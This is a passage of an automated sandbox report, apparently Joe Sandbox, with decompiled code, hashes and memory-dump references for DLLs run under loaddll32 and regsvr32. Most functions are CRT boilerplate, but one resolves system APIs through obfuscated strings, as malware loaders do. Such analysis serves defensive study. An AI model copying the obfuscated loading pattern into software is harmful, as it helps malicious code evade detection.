Instruction Fuzzy Hash: 554198B1A05255BFCB12CBE9D880A9EBBBCEFD6304F100466E651AB740E770DA408F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EB475 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6E9EB475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E9EAD86(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E9EAD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E9EA645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E9EA578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E9EB04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E9ED547(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e9eb475
0x6e9eb475
0x6e9eb47c
0x6e9eb485
0x6e9eb5a4
0x6e9eb48b
0x6e9eb48b
0x6e9eb48c
0x6e9eb48d
0x6e9eb497
0x6e9eb49a
0x6e9eb4a0
0x6e9eb4aa
0x6e9eb4cf
0x6e9eb4d4
0x6e9eb4d9
0x6e9eb5a0
0x00000000
0x6e9eb5a1
0x6e9eb4d9
0x6e9eb4aa
0x6e9eb4df
0x6e9eb4e2
0x6e9eb4e5
0x6e9eb4eb
0x6e9eb4f1
0x6e9eb503
0x6e9eb508
0x6e9eb50b
0x6e9eb50e
0x6e9eb511
0x6e9eb514
0x6e9eb51a
0x6e9eb520
0x6e9eb523
0x6e9eb526
0x6e9eb535
0x6e9eb536
0x6e9eb536
0x6e9eb53b
0x6e9eb54e
0x6e9eb550
0x6e9eb555
0x6e9eb560
0x6e9eb562
0x6e9eb564
0x6e9eb580
0x6e9eb585
0x6e9eb588
0x6e9eb588
0x6e9eb560
0x6e9eb555
0x6e9eb58e
0x6e9eb58f
0x6e9eb592
0x6e9eb595
0x6e9eb598
0x6e9eb59b
0x6e9eb526
0x00000000
0x6e9eb51a
0x6e9eb5a5
0x6e9eb5aa
0x6e9eb5ae
0x6e9eb5b1
0x6e9eb5b2
0x6e9eb5b3
0x6e9eb5b4
0x6e9eb5b9
0x6e9eb631
0x6e9eb633
0x6e9eb5bb
0x6e9eb5bb
0x6e9eb5c1
0x00000000
0x6e9eb5c3
0x6e9eb5c6
0x6e9eb5c9
0x6e9eb5d0
0x6e9eb5d3
0x6e9eb5d7
0x6e9eb609
0x6e9eb60c
0x6e9eb613
0x6e9eb619
0x6e9eb623
0x6e9eb62c
0x6e9eb62c
0x6e9eb623
0x6e9eb619
0x6e9eb62d
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5dc
0x6e9eb5dc
0x6e9eb5e0
0x00000000
0x00000000
0x6e9eb5e4
0x6e9eb5f8
0x6e9eb5f8
0x6e9eb5e6
0x6e9eb5e6
0x6e9eb5ec
0x00000000
0x6e9eb5ee
0x6e9eb5ee
0x6e9eb5f1
0x6e9eb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5f6
0x6e9eb5ec
0x6e9eb601
0x6e9eb603
0x00000000
0x6e9eb605
0x6e9eb605
0x6e9eb605
0x00000000
0x6e9eb603
0x6e9eb5fc
0x6e9eb5fe
0x00000000
0x6e9eb5fe
0x00000000
0x00000000
0x00000000
0x6e9eb5c9
0x6e9eb5c1
0x6e9eb634
0x6e9eb638
0x6e9eb638

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E9EB49A

Strings

MOC, xrefs: 6E9EB4AC
RCC, xrefs: 6E9EB4B4

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
Instruction ID: a800fabcc5f9de88481d01bcb026544365ab169e725fa02f203a4ff5538e5590
Opcode Fuzzy Hash: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
Instruction Fuzzy Hash: B741487290020AAFDF26CFD4C880AEE7BB9BF48304F148499FA15A6668E735D950DF51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5264, Parent PID: 4360COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1636
Total number of Limit Nodes:	30

Executed Functions

Function 6F6C93FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6F6C93FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6f6da5f0);
				E6F6C9960(__ebx, __edi, __esi);
				_t34 =  *0x6f6dcfec; // 0x1
				if(_t34 > 0) {
					 *0x6f6dcfec = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6F6C8E91();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6f6dcfc8 - 2;
					if( *0x6f6dcfc8 != 2) {
						E6F6C9839(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6f6da618);
						E6F6C9960(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6F6C95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6F6C92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6F6C9A40();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6F6C9A40();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6F6C93FD(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6F6C95B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6F6C92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6F6C95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6f6dcfec - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6F6C8F5C(__ebx, _t61, 1, __esi);
						E6F6C9A52();
						E6F6C9AB3();
						 *0x6f6dcfc8 =  *0x6f6dcfc8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6F6C9492();
						_t54 = E6F6C90FE( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6F6C949F();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6f6c93fd
0x6f6c93fd
0x6f6c93ff
0x6f6c9404
0x6f6c9409
0x6f6c9410
0x6f6c9417
0x6f6c941f
0x6f6c9422
0x6f6c942b
0x6f6c942e
0x6f6c9431
0x6f6c9438
0x6f6c94a7
0x6f6c94ac
0x6f6c94ad
0x6f6c94af
0x6f6c94b4
0x6f6c94b9
0x6f6c94bc
0x6f6c94be
0x6f6c94cf
0x6f6c94cf
0x6f6c94d3
0x6f6c94d6
0x6f6c94e2
0x6f6c94e2
0x6f6c94ef
0x6f6c94f1
0x6f6c94f4
0x6f6c94f6
0x6f6c9501
0x6f6c9506
0x6f6c9508
0x6f6c950b
0x6f6c950d
0x00000000
0x00000000
0x6f6c950d
0x6f6c94d8
0x6f6c94d8
0x6f6c94db
0x00000000
0x6f6c94dd
0x6f6c94dd
0x6f6c9513
0x6f6c9513
0x6f6c9514
0x6f6c9515
0x6f6c9518
0x6f6c951d
0x6f6c951f
0x6f6c9522
0x6f6c9525
0x6f6c9527
0x6f6c9529
0x6f6c952b
0x6f6c952c
0x6f6c952d
0x6f6c9530
0x6f6c9535
0x6f6c9537
0x6f6c9537
0x6f6c953d
0x6f6c953e
0x6f6c9543
0x6f6c9549
0x6f6c9549
0x6f6c9529
0x6f6c954e
0x6f6c9550
0x6f6c9557
0x6f6c9561
0x6f6c9563
0x6f6c9566
0x6f6c9568
0x6f6c9574
0x6f6c959c
0x6f6c959c
0x6f6c9552
0x6f6c9552
0x6f6c9555
0x00000000
0x00000000
0x6f6c9555
0x6f6c9550
0x6f6c94db
0x6f6c959f
0x6f6c95a6
0x6f6c94c0
0x6f6c94c0
0x6f6c94c6
0x00000000
0x6f6c94c8
0x6f6c94c8
0x6f6c94c8
0x6f6c94c6
0x6f6c95ab
0x6f6c95b7
0x6f6c943a
0x6f6c943a
0x6f6c943f
0x6f6c9444
0x6f6c9449
0x6f6c9450
0x6f6c9454
0x6f6c945e
0x6f6c946a
0x6f6c946c
0x6f6c946c
0x6f6c946e
0x6f6c9471
0x6f6c9478
0x6f6c947d
0x00000000
0x6f6c947d
0x6f6c9412
0x6f6c9412
0x6f6c947f
0x6f6c9482
0x6f6c948e
0x6f6c948e

APIs

__RTC_Initialize.LIBCMT ref: 6F6C9444
___scrt_uninitialize_crt.LIBCMT ref: 6F6C945E

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 61aacdd180d0e61f3395783ca4ad52627c45cf51b06a07ed3f57139df1ab5fec
Instruction ID: b350dd600c65a4a2a51efc84f604562c626d1fa496930f9032f901d351241711
Opcode Fuzzy Hash: 61aacdd180d0e61f3395783ca4ad52627c45cf51b06a07ed3f57139df1ab5fec
Instruction Fuzzy Hash: 3C41E672E04718EFDB108F65C940BAE7E79EF4576CF01815AE894A7288CB309D11CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C94AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E6F6C94AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6f6da618);
				E6F6C9960(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6F6C95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6F6C92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6F6C9A40();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6F6C9A40();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6F6C93FD(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6F6C95B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6F6C92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6F6C95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6f6dcfec - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6f6c94ad
0x6f6c94ad
0x6f6c94af
0x6f6c94b4
0x6f6c94b9
0x6f6c94be
0x6f6c94cf
0x6f6c94cf
0x6f6c94d3
0x6f6c94d6
0x6f6c94e2
0x6f6c94e2
0x6f6c94ef
0x6f6c94f1
0x6f6c94f4
0x6f6c94f6
0x6f6c959f
0x6f6c959f
0x6f6c95a6
0x6f6c95a8
0x6f6c95ab
0x6f6c95b7
0x6f6c95b7
0x6f6c9501
0x6f6c9506
0x6f6c9508
0x6f6c950b
0x6f6c950d
0x00000000
0x00000000
0x6f6c9513
0x6f6c9513
0x6f6c9514
0x6f6c9515
0x6f6c9518
0x6f6c951d
0x6f6c951f
0x6f6c9522
0x6f6c9525
0x6f6c9527
0x6f6c9529
0x6f6c952b
0x6f6c952c
0x6f6c952d
0x6f6c9530
0x6f6c9535
0x6f6c9537
0x6f6c9537
0x6f6c953d
0x6f6c953e
0x6f6c9543
0x6f6c9549
0x6f6c9549
0x6f6c9529
0x6f6c954e
0x6f6c9550
0x6f6c9557
0x6f6c9561
0x6f6c9563
0x6f6c9566
0x6f6c9568
0x6f6c9574
0x6f6c959c
0x6f6c959c
0x00000000
0x6f6c9552
0x6f6c9552
0x6f6c9555
0x00000000
0x00000000
0x00000000
0x6f6c9555
0x6f6c9550
0x6f6c94d8
0x6f6c94db
0x00000000
0x00000000
0x6f6c94dd
0x00000000
0x6f6c94dd
0x6f6c94c0
0x6f6c94c6
0x00000000
0x00000000
0x6f6c94c8
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6F6C94EA
dllmain_crt_dispatch.LIBCMT ref: 6F6C9501
dllmain_raw.LIBCMT ref: 6F6C9549
dllmain_crt_dispatch.LIBCMT ref: 6F6C955C
dllmain_raw.LIBCMT ref: 6F6C956F

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: bab6f74c9380f278807910a24e3905f173c7711b85b30a7f4cbe26a10a711c94
Instruction ID: 6f3a6ca2cd73378367fab53783b83b0fd283e8d8eab70c23952fbaefe09765f3
Opcode Fuzzy Hash: bab6f74c9380f278807910a24e3905f173c7711b85b30a7f4cbe26a10a711c94
Instruction Fuzzy Hash: AB21D1B2D00328AFDB218E65CC40AAF3E79EF85B9CF414155F8986B248C7319D118BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C5D90 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6F6C5D90(void* __eflags) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				CHAR* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _t86;

				_v5 = 0;
				_t86 = E6F6C2640(L"KERNEL32.dll", 0); // executed
				_v24 = _t86;
				_v20 = E6F6C3C50(E6F6C4F10( &_v5));
				_v28 = _v24(_v20);
				if(_v28 == 0) {
					_v6 = 0;
					_v36 = E6F6C2430(L"KERNEL32.dll", 0);
					_v32 = E6F6C3BF0(E6F6C3DF0( &_v6));
					_v36(_v32);
				}
				_v7 = 0;
				_v44 = E6F6C2640(L"KERNEL32.dll", 0);
				_v40 = E6F6C3C90(E6F6C4120( &_v7));
				_v48 = _v44(_v40);
				if(_v48 == 0) {
					_v8 = 0;
					_v56 = E6F6C2430(L"KERNEL32.dll", 0);
					_v52 = E6F6C3CD0(E6F6C5090( &_v8));
					_v56(_v52);
				}
				_v9 = 0;
				_v64 = E6F6C2640(L"KERNEL32.dll", 0);
				_v60 = E6F6C3B10(E6F6C4E00( &_v9));
				_v68 = _v64(_v60);
				if(_v68 == 0) {
					_v10 = 0;
					_v76 = E6F6C2430(L"KERNEL32.dll", 0);
					_v72 = E6F6C3B30(E6F6C43F0( &_v10));
					LoadLibraryA(_v72);
				}
				_v11 = 0;
				_v84 = E6F6C2640(L"KERNEL32.dll", 0);
				_v80 = E6F6C3BD0(E6F6C4F90( &_v11));
				_v88 = _v84(_v80);
				if(_v88 == 0) {
					_v12 = 0;
					_v96 = E6F6C2430(L"KERNEL32.dll", 0);
					_v92 = E6F6C3C10(E6F6C4A40( &_v12));
					LoadLibraryA(_v92);
				}
				_v13 = 0;
				_v104 = E6F6C2640(L"KERNEL32.dll", 0);
				_v100 = E6F6C3BB0(E6F6C5010( &_v13));
				_v108 = _v104(_v100);
				if(_v108 == 0) {
					_v14 = 0;
					_v116 = E6F6C2430(L"KERNEL32.dll", 0);
					_v112 = E6F6C3C30(E6F6C4AC0( &_v14));
					_v116(_v112);
				}
				_v15 = 0;
				_v124 = E6F6C2640(L"KERNEL32.dll", 0);
				_v120 = E6F6C3B70(E6F6C4510( &_v15));
				_v128 = _v124(_v120);
				if(_v128 == 0) {
					_v16 = 0;
					_v136 = E6F6C2430(L"Kernel32.dll", 0);
					_v132 = E6F6C3B90(E6F6C5200( &_v16));
					_v136(_v132);
				}
				return 1;
			}

0x6f6c5d9b
0x6f6c5da5
0x6f6c5daa
0x6f6c5dbc
0x6f6c5dc6
0x6f6c5dcd
0x6f6c5dd1
0x6f6c5de0
0x6f6c5df2
0x6f6c5df9
0x6f6c5df9
0x6f6c5dfe
0x6f6c5e0d
0x6f6c5e1f
0x6f6c5e29
0x6f6c5e30
0x6f6c5e34
0x6f6c5e43
0x6f6c5e55
0x6f6c5e5c
0x6f6c5e5c
0x6f6c5e61
0x6f6c5e70
0x6f6c5e82
0x6f6c5e8c
0x6f6c5e93
0x6f6c5e97
0x6f6c5ea6
0x6f6c5eb8
0x6f6c5ebf
0x6f6c5ebf
0x6f6c5ec4
0x6f6c5ed3
0x6f6c5ee5
0x6f6c5eef
0x6f6c5ef6
0x6f6c5efa
0x6f6c5f09
0x6f6c5f1b
0x6f6c5f22
0x6f6c5f22
0x6f6c5f27
0x6f6c5f36
0x6f6c5f48
0x6f6c5f52
0x6f6c5f59
0x6f6c5f5d
0x6f6c5f6c
0x6f6c5f7e
0x6f6c5f85
0x6f6c5f85
0x6f6c5f8a
0x6f6c5f99
0x6f6c5fab
0x6f6c5fb5
0x6f6c5fbc
0x6f6c5fc0
0x6f6c5fcf
0x6f6c5fe4
0x6f6c5feb
0x6f6c5feb
0x6f6c5ff6

APIs

LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6F6C5EBF
LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6F6C5F22

Strings

Kernel32.dll, xrefs: 6F6C5FC5
KERNEL32.dll, xrefs: 6F6C5DA0, 6F6C5DD6, 6F6C5E03, 6F6C5E39, 6F6C5E66, 6F6C5E9C, 6F6C5EC9, 6F6C5EFF, 6F6C5F2C, 6F6C5F62, 6F6C5F8F

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID: KERNEL32.dll$Kernel32.dll
API String ID: 1029625771-1263921953
Opcode ID: 523754f868c763c88b07e652737b95b370ddf7f68128728d52231eed8b97880a
Instruction ID: a3012eb51d155dc369da2f71e4518b5e8dbffb71b585c173a3eb0fb18553d9ad
Opcode Fuzzy Hash: 523754f868c763c88b07e652737b95b370ddf7f68128728d52231eed8b97880a
Instruction Fuzzy Hash: BD710870E10358AFCF04DBF8D855BDEBBB1EF58304F104569E486AB280EF745A048B96

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C8A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6F6C8A90(void* __ecx, void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
